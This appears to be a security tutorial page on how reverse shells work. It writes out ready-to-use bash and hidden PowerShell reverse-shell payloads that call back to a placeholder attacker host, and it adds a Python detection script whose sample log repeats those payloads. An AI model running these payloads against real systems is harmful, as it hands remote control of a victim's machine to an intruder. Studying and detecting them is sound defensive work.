# Reverse Shell?

A reverse shell is a type of shell in which the direction of the connection is reversed. Instead of the attacker connecting directly to the target machine, the target machine establishes a connection back to the attacker. This can help evade firewalls and other security controls that block inbound connections.

<https://www.revshells.com/>

## <mark style="color:green;">**How a Reverse Shell Works**</mark>

1. <mark style="color:green;">**Attacker**</mark><mark style="color:green;">:</mark> Starts a listener on their own machine to wait for incoming connections.
2. <mark style="color:green;">**Victim**</mark><mark style="color:green;">:</mark> Runs a payload that opens a connection to the attacker's machine.
3. <mark style="color:green;">**Remote Control**</mark><mark style="color:green;">:</mark> Once the connection is established, the attacker can send commands and control the victim's system.

## <mark style="color:green;">**Reverse Shell Example in Bash (Linux):**</mark>

**Attacker**:

```bash
nc -lvnp 4444
```

**Victim**:

```bash
bash -i >& /dev/tcp/attacker_ip/4444 0>&1
```

## <mark style="color:green;">**Reverse Shell Example in PowerShell (Windows):**</mark>

**Attacker**:

```bash
nc -lvnp 4444
```

**Victim**:

{% code overflow="wrap" %}

```powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "New-Object System.Net.Sockets.TCPClient('attacker_ip',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

{% endcode %}
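
Both payloads above leave recognizable traces in process command-line logs (for example from auditd or Sysmon). The following is an added example, not part of the original page, that flags those traces in Python; the `host|user|command line` log format, the sample entries and the 203.0.113.10 address are constructed for illustration.

```python
import re

# Each rule lists regexes that must ALL match one command line. The patterns
# come from the two payloads shown on this page.
RULES = {
    "bash_dev_tcp": [
        re.compile(r"\b(ba)?sh\b.*\s-i\b"),              # interactive shell
        re.compile(r"/dev/(tcp|udp)/[^/\s]+/\d{1,5}"),   # bash network pseudo-device
    ],
    "powershell_tcpclient": [
        re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I),
        re.compile(r"Net\.Sockets\.TCPClient", re.I),    # outbound TCP socket
        re.compile(r"\b(iex|Invoke-Expression)\b", re.I),  # executes received text
    ],
}

# Launch flags that hide the window or relax policy. Common in legitimate
# automation too, so they only add context and never alert on their own.
PS_FLAGS = re.compile(
    r"\s-(w(indowstyle)?\s+hidden|exec(utionpolicy)?\s+bypass"
    r"|nop(rofile)?|noni(nteractive)?)\b", re.I)

# Constructed sample log, format: host|user|command line
SAMPLE_LOG = [
    "web01|www-data|bash -i >& /dev/tcp/203.0.113.10/4444 0>&1",
    "web01|deploy|ssh -i /home/deploy/.ssh/id_ed25519 git@repo.example",
    "ws07|alice|powershell -NoP -NonI -W Hidden -Exec Bypass -Command "
    "\"New-Object System.Net.Sockets.TCPClient('203.0.113.10',4444); [...] "
    "(iex $data 2>&1 | Out-String ) [...]\"",
    "ws07|svc_build|powershell -NoProfile -ExecutionPolicy Bypass -File build.ps1",
]

def classify(cmdline):
    """Return (rule_name, evasive_flag_count), or None if no rule matches."""
    for name, patterns in RULES.items():
        if all(p.search(cmdline) for p in patterns):
            return name, len(PS_FLAGS.findall(cmdline))
    return None

def scan(lines):
    """Return (host, user, rule, flag_count) for every matching log line."""
    alerts = []
    for line in lines:
        host, user, cmdline = line.split("|", 2)  # cmdline may contain '|'
        hit = classify(cmdline)
        if hit:
            alerts.append((host, user, *hit))
    return alerts

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

Command-line matching is only one layer: because the victim initiates the connection, restricting outbound traffic from servers and workstations to known destinations removes the advantage described at the top of this page.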


